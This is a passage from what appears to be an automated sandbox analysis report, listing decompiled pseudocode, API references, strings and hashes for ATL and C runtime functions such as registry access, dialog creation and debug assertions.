                      				_v8 = __ecx;
                      				do {
                      					_t72 = _a4;
                      					if(_a4 == 0) {
                      						_t37 = L00994930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16fb, 0, "%ls", L"hKeyParent != 0");
                      						_t70 = _t70 + 0x18;
                      						if(_t37 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v16 = 0;
                      				if( *((intOrPtr*)(_v8 + 8)) == 0) {
                      					_t68 = _t70;
                      					_t64 = _a4;
                      					_t39 = RegOpenKeyExA(_t64, _a8, 0, _a12,  &_v16);
                      					__eflags = _t70 - _t70;
                      					_v28 = E009D1520(_t39, _t70 - _t70);
                      				} else {
                      					_t64 = _a8;
                      					_v28 = E009430F0( *((intOrPtr*)(_v8 + 8)), _t68, _a4, _t64, 0, _a12,  &_v16);
                      				}
                      				_v24 = _v28;
                      				if(_v24 == 0) {
                      					_v24 = E00944420(_v8, _t68);
                      					_t77 = _v24;
                      					if(_v24 != 0) {
                      						_t48 = L00994930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1703, 0, "%ls", L"lRes == 0L");
                      						_t70 = _t70 + 0x18;
                      						if(_t48 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					 *_v8 = _v16;
                      					_t64 = _v8;
                      					 *(_t64 + 4) = _a12 & 0x00000300;
                      				}
                      				_push(_t64);
                      				_push(_v24);
                      				E009D14C0(_t69, 0x944718);
                      				_pop(_t44);
                      				return E009D1520(_t44, _t69 - _t70 + 0x18);
                      			}

                      APIs
                      • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,0094AED1,00000000,?), ref: 00944687
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009446FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckOpenStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0$lRes == 0L
                      • API String ID: 2727503844-1643637747
                      • Opcode ID: 318f1c46bf4316379087309abcb80903030545747021ecbf334108c490c31b7c
                      • Instruction ID: 8e7154d78eee999a72a9ea9662e090b0475eda1b2a265a2b0a6084a95582bc8f
                      • Opcode Fuzzy Hash: 318f1c46bf4316379087309abcb80903030545747021ecbf334108c490c31b7c
                      • Instruction Fuzzy Hash: 5D314375E40209EFDB04DF98D952FAEB7B4BB88704F208559F605A7281E7705E50CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 66%
                      			E0094C1E0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                      				intOrPtr _v8;
                      				intOrPtr* _v12;
                      				char _v24;
                      				intOrPtr* _v32;
                      				intOrPtr _v36;
                      				char _v44;
                      				intOrPtr* _t35;
                      				void* _t42;
                      				intOrPtr _t46;
                      				void* _t48;
                      				void* _t50;
                      				intOrPtr _t67;
                      				void* _t74;
                      				void* _t75;
                      				void* _t77;
                      				void* _t78;
                      				void* _t79;
                      				void* _t80;
                      
                      				_t67 = __edx;
                      				_t74 =  &_v44;
                      				memset(_t74, 0xcccccccc, 0xa << 2);
                      				_t79 = _t78 + 0xc;
                      				_t75 = _t74 + 0xa;
                      				if(_a4 != 0) {
                      					_v8 = 0;
                      					_push(0x9d8724);
                      					_t35 = E009579A0(0xc);
                      					_t80 = _t79 + 8;
                      					_v32 = _t35;
                      					_v12 = _v32;
                      					__eflags = _v12;
                      					if(_v12 != 0) {
                      						 *_v12 = _a8;
                      						 *((intOrPtr*)(_v12 + 4)) = _a12;
                      						E00951D00(__ebx,  &_v24, _t75, __esi, _a4 + 0xc, 0);
                      						_v8 = E00951D90( &_v24, __esi);
                      						__eflags = _v8;
                      						if(__eflags < 0) {
                      							_t67 = _v12;
                      							_v36 = _t67;
                      							E009582A0(_v36);
                      							_t42 = E0094F210(0xb33704);
                      							E009423E0(__ebx, _t75, __esi, __eflags, E009423B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fc), _t42, 0, "ERROR : Unable to lock critical section in AtlModuleAddTermFunc\n", 0xc);
                      							_t80 = _t80 + 0x18;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								_t50 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fd, 0, "%ls", 0x9f40dc);
                      								_t80 = _t80 + 0x18;
                      								__eflags = _t50 - 1;
                      								if(_t50 == 1) {
                      									asm("int3");
                      								}
                      							}
                      						} else {
                      							_t67 =  *((intOrPtr*)(_a4 + 8));
                      							 *((intOrPtr*)(_v12 + 8)) = _t67;
                      							 *((intOrPtr*)(_a4 + 8)) = _v12;
                      						}
                      						E00951D60( &_v24);
                      					} else {
                      						_v8 = 0x8007000e;
                      					}
                      					_t46 = _v8;
                      				} else {
                      					_t46 = 0x80070057;
                      				}
                      				_push(_t67);
                      				E009D14C0(_t77, 0x94c31c);
                      				_t48 = _t46;
                      				return E009D1520(_t48, _t77 - _t80 + 0x28);
                      			}

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094C301
                      Strings
                      • %ls, xrefs: 0094C2CB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C2AC
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 0094C2D7
                      • ERROR : Unable to lock critical section in AtlModuleAddTermFunc, xrefs: 0094C295
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlModuleAddTermFunc
                      • API String ID: 930174750-2929966712
                      • Opcode ID: 795e148496ea17ac70cf1ca68fd91a8ade924533032db2604b912784701e4810
                      • Instruction ID: d8f3af7b5384f5c5fda10c06185879f9a6f93a69e52917099c82e3bc2fc02202
                      • Opcode Fuzzy Hash: 795e148496ea17ac70cf1ca68fd91a8ade924533032db2604b912784701e4810
                      • Instruction Fuzzy Hash: 363181B4E41208EFDB04EFD4D852FAEB7B4EB84715F108059F9057B392DAB49A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E00944960(void** __ecx, void* __esi, char* _a4, char* _a8) {
                      				void** _v8;
                      				char* _v12;
                      				int _v16;
                      				void** _v20;
                      				int _v24;
                      				int _v28;
                      				void* _t36;
                      				long _t41;
                      				void* _t42;
                      				void* _t44;
                      				void* _t45;
                      				void* _t58;
                      				void* _t59;
                      
                      				_v28 = 0xcccccccc;
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t61 =  *_v8;
                      					if( *_v8 == 0) {
                      						_t45 = L00994930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1886, 0, "%ls", L"m_hKey != 0");
                      						_t59 = _t59 + 0x18;
                      						if(_t45 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				L5:
                      				L5:
                      				if(_a8 == 0) {
                      					_v28 = 0;
                      				} else {
                      					_v28 = 1;
                      				}
                      				_v24 = _v28;
                      				_t65 = _v24;
                      				if(_v24 == 0) {
                      					_t44 = L00994930(_t65, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1887, 0, "%ls", L"__atl_condVal");
                      					_t59 = _t59 + 0x18;
                      					if(_t44 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v24 != 0) {
                      					goto L13;
                      				}
                      				_t42 = 0xd;
                      				L17:
                      				return E009D1520(_t42, _t58 - _t59 + 0x18);
                      				L13:
                      				__eflags = 0;
                      				if(0 != 0) {
                      					goto L5;
                      				}
                      				_v16 = 0;
                      				_v12 = _a8;
                      				do {
                      					_t36 = E00992E00(_v12);
                      					_t59 = _t59 + 4;
                      					_v20 = _t36 + 1;
                      					_v12 = _v12 + _v20;
                      					_v16 = _v16 + _v20;
                      					__eflags = _v20 - 1;
                      				} while (_v20 != 1);
                      				_t41 = RegSetValueExA( *_v8, _a4, 0, 7, _a8, _v16);
                      				__eflags = _t59 - _t59;
                      				_t42 = E009D1520(_t41, __eflags);
                      				goto L17;
                      			}

                      APIs
                      • _strlen.LIBCMT ref: 00944A1D
                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000007,00000000,00000000), ref: 00944A5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-3821136969
                      • Opcode ID: 5c50a0584735cb933a234d364e72b1f170008da97bcead8ebf3ca55a419bc951
                      • Instruction ID: 67d37f88aabe8c81f9a902f8a42a390710c7f3a358f6d4c54aaa38fb8dd9037e
                      • Opcode Fuzzy Hash: 5c50a0584735cb933a234d364e72b1f170008da97bcead8ebf3ca55a419bc951
                      • Instruction Fuzzy Hash: F7317E71E40209EFDB10DF98C842FAEB7B8AB94B04F208159E604B7281E7745B80CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 57%
                      			E0094DD40(void* __ebx, intOrPtr __ecx, void* __esi, struct HWND__* _a4, long _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _t21;
                      				struct HWND__* _t27;
                      				intOrPtr _t30;
                      				void* _t32;
                      				void* _t34;
                      				void* _t35;
                      				void* _t51;
                      				void* _t52;
                      
                      				_t35 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				do {
                      					_t21 = _v8;
                      					_t54 =  *((intOrPtr*)(_t21 + 4));
                      					if( *((intOrPtr*)(_t21 + 4)) != 0) {
                      						_t34 = L00994930(_t54, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfbd, 0, "%ls", L"this->m_hWnd == 0");
                      						_t52 = _t52 + 0x18;
                      						if(_t34 == 1) {
                      							asm("int3");
                      						}
                      					}
                      				} while (0 != 0);
                      				_v12 = E0094C490(_v8 + 8, 0, 0, 0);
                      				if(_v12 != 0) {
                      					E00943B00(_t35, 0xb33710, __eflags, _v8 + 8, _v8);
                      					 *((char*)(_v8 + 0x20)) = 0;
                      					_t27 = CreateDialogParamA(E00942B30(0xb30220), 0xca, _a4, E00952030, _a8);
                      					__eflags = _t52 - _t52;
                      					_v16 = E009D1520(_t27, _t52 - _t52);
                      					do {
                      						__eflags =  *((intOrPtr*)(_v8 + 4)) - _v16;
                      						if(__eflags != 0) {
                      							_t32 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfcf, 0, "%ls", L"this->m_hWnd == hWnd");
                      							_t52 = _t52 + 0x18;
                      							__eflags = _t32 - 1;
                      							if(_t32 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = 0;
                      					} while (0 != 0);
                      					_t30 = _v16;
                      					L13:
                      					return E009D1520(_t30, _t51 - _t52 + 0xc);
                      				}
                      				SetLastError(0xe);
                      				E009D1520(_t22, _t52 - _t52);
                      				_t30 = 0;
                      				goto L13;
                      			}

                      APIs
                      • SetLastError.KERNEL32(0000000E), ref: 0094DDAE
                      • CreateDialogParamA.USER32(00000000,000000CA,00000000,00952030,CCCCCCCC), ref: 0094DDFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CreateDialogErrorLastParam
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$this->m_hWnd == 0$this->m_hWnd == hWnd
                      • API String ID: 3445605341-3995377508
                      • Opcode ID: 06c80459020e51cd4c79fe0bc5ee4cdb67b4952d765c5e4b08e3a7a42f930b3a
                      • Instruction ID: d5371e23e93bfb6ee6d7b5a25565f5755b3adefba5ab12f02d89bfb0d792756c
                      • Opcode Fuzzy Hash: 06c80459020e51cd4c79fe0bc5ee4cdb67b4952d765c5e4b08e3a7a42f930b3a
                      • Instruction Fuzzy Hash: 0D210531E81208BBCB10EBA8DD53F6EB765EF90704F208595F6046B2C2D6B49E408B95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0095BCF0(intOrPtr* _a4, intOrPtr* _a8) {
                      				char _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				void* _t30;
                      				intOrPtr _t31;
                      				signed char _t38;
                      				intOrPtr _t59;
                      				void* _t67;
                      
                      				if( *_a8 != 0) {
                      					L2:
                      					_t30 = L00994930(_t72, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_exception.cpp", 0x12, 0, "%ls", L"to->_What == nullptr && to->_DoFree == false");
                      					_t67 = _t67 + 0x18;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      					L4:
                      					if(( *(_a4 + 4) & 0x000000ff) == 0 ||  *_a4 == 0) {
                      						_t31 =  *_a4;
                      						 *_a8 = _t31;
                      						 *((char*)(_a8 + 4)) = 0;
                      						return _t31;
                      					} else {
                      						_v12 = E00992E00( *_a4) + 1;
                      						E0095BBF0( &_v8, L00995F00(_v12));
                      						_t38 = E0095BC30( &_v8);
                      						__eflags = _t38 & 0x000000ff;
                      						if((_t38 & 0x000000ff) != 0) {
                      							_v16 =  *_a4;
                      							_v20 = E0095BC80( &_v8);
                      							E00992DE0(_v20, _v12, _v16);
                      							 *_a8 = E0095BC50( &_v8);
                      							 *((char*)(_a8 + 4)) = 1;
                      							return E0095BC10( &_v8);
                      						}
                      						return E0095BC10( &_v8);
                      					}
                      				}
                      				_t59 = _a8;
                      				_t72 =  *(_t59 + 4) & 0x000000ff;
                      				if(( *(_t59 + 4) & 0x000000ff) == 0) {
                      					goto L4;
                      				}
                      				goto L2;
                      			}

                      APIs
                      • _strlen.LIBCMT ref: 0095BD5B
                      • __aligned_msize.LIBCMTD ref: 0095BDB6
                      • __crt_unique_heap_ptr.LIBCMTD ref: 0095BDC1
                        • Part of subcall function 0095BC10: __crt_unique_heap_ptr.LIBCMTD ref: 0095BC1A
                      Strings
                      • %ls, xrefs: 0095BD0E
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 0095BD17
                      • to->_What == nullptr && to->_DoFree == false, xrefs: 0095BD09
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                      • API String ID: 3817959681-3374554652
                      • Opcode ID: 0c9995d292e9b7a6377fad1ae12b43c185911a7f830dffca1714e333cd079eb9
                      • Instruction ID: ac995aa12bfb13d514ece44c98ed5360765f07678609c7c1ab17d0e0bc57bb01
                      • Opcode Fuzzy Hash: 0c9995d292e9b7a6377fad1ae12b43c185911a7f830dffca1714e333cd079eb9
                      • Instruction Fuzzy Hash: CD312FB4A0020CAFCB04DF59C892BAEB775EF95305F54C099ED595B382EB31EA45CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E009C5530(intOrPtr _a4) {
                      				char _v8;
                      				char _v12;
                      				intOrPtr _t27;
                      				void* _t35;
                      				void* _t37;
                      				void* _t40;
                      				intOrPtr _t58;
                      				intOrPtr _t62;
                      				void* _t64;
                      
                      				_t66 = _a4;
                      				if(_a4 == 0) {
                      					_t40 = L00994930(_t66, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x12, 0, L"%ls", L"public_stream != nullptr");
                      					_t64 = _t64 + 0x18;
                      					if(_t40 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				E00976E20( &_v8, _a4);
                      				_t58 =  *0xb31184; // 0x0
                      				 *0xb31184 = _t58 + 1;
                      				_t27 = E0099C129(L0095BF60( &_v12, E00999580(0x1000, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\_getbuf.cpp", 0x1b)));
                      				 *((intOrPtr*)(E00977320( &_v8) + 4)) = _t27;
                      				E0095BFA0( &_v12);
                      				if( *((intOrPtr*)(E00977320( &_v8) + 4)) == 0) {
                      					E009A9080( &_v8, 0x400);
                      					_t62 = E00977320( &_v8) + 0x14;
                      					__eflags = _t62;
                      					 *((intOrPtr*)(E00977320( &_v8) + 4)) = _t62;
                      					 *((intOrPtr*)(E00977320( &_v8) + 0x18)) = 2;
                      				} else {
                      					E009A9080( &_v8, 0x40);
                      					 *((intOrPtr*)(E00977320( &_v8) + 0x18)) = 0x1000;
                      				}
                      				_t35 = E00977320( &_v8);
                      				 *((intOrPtr*)(E00977320( &_v8))) =  *((intOrPtr*)(_t35 + 4));
                      				_t37 = E00977320( &_v8);
                      				 *((intOrPtr*)(_t37 + 8)) = 0;
                      				return _t37;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009C5569
                      • __wcstombs_l.LIBCMTD ref: 009C558B
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 009C554D
                      • %ls, xrefs: 009C5544
                      • public_stream != nullptr, xrefs: 009C553F
                      • minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp, xrefs: 009C557F
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___wcstombs_lstd::_
                      • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$minkernel\crts\ucrt\src\appcrt\stdio\_getbuf.cpp$public_stream != nullptr
                      • API String ID: 2681442900-187094882
                      • Opcode ID: 2ad4900828c947389949a265e2577da2706209a8a1f0f41d4c1bec26031b45af
                      • Instruction ID: 77cadcde2c1a0081f08d845a4022b954d9997b3f0e83a47f3cd8c788bce41824
                      • Opcode Fuzzy Hash: 2ad4900828c947389949a265e2577da2706209a8a1f0f41d4c1bec26031b45af
                      • Instruction Fuzzy Hash: BC215031A40108ABCB14FB90ED57FEDB764AF90744F518098E9062B1D2DF706F48EB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 36%
                      			E00943C10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				void* _t22;
                      				void* _t29;
                      				void* _t30;
                      				void* _t31;
                      				void* _t45;
                      				void* _t46;
                      				void* _t47;
                      
                      				_t45 = __esi;
                      				_t44 = __edi;
                      				_t31 = __ebx;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				E00944160(_v8 + 4, __edi, __eflags);
                      				_t50 =  *0xb315ec;
                      				if( *0xb315ec != 0) {
                      					_t30 = L00994930(_t50, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbdf, 0, "%ls", L"_pAtlModule == 0");
                      					_t47 = _t47 + 0x18;
                      					_t51 = _t30 - 1;
                      					if(_t30 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				 *((intOrPtr*)(_v8 + 4)) = 0;
                      				 *((intOrPtr*)(_v8 + 0xc)) = 0;
                      				 *((intOrPtr*)(_v8 + 8)) = 0;
                      				 *0xb315ec = _v8;
                      				 *((intOrPtr*)(_v8 + 0x28)) = 0;
                      				_t22 = E00942900(_v8 + 0x10, _t45, _t51);
                      				_t52 = _t22;
                      				if(_t22 >= 0) {
                      					 *((intOrPtr*)(_v8 + 4)) = 0x24;
                      				} else {
                      					_push("ERROR : Unable to initialize critical section in CAtlModule\n");
                      					_push(0);
                      					_push(E0094F210(0xb33704));
                      					_push(E009423B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbe9));
                      					E009423E0(_t31, _t44, _t45, _t52);
                      					_t47 = _t47 + 0x10;
                      					if(0 == 0) {
                      						_t29 = L00994930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xbea, 0, "%ls", 0x9f40dc);
                      						_t47 = _t47 + 0x18;
                      						if(_t29 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					 *0xb33675 = 1;
                      				}
                      				return E009D1520(_v8, _t46 - _t47 + 0xc);
                      			}

                      APIs
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlModule, xrefs: 00943CA8
                      • %ls, xrefs: 00943C47, 00943CDE
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943CBF
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00943C53, 00943CEA
                      • _pAtlModule == 0, xrefs: 00943C42
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Smanip
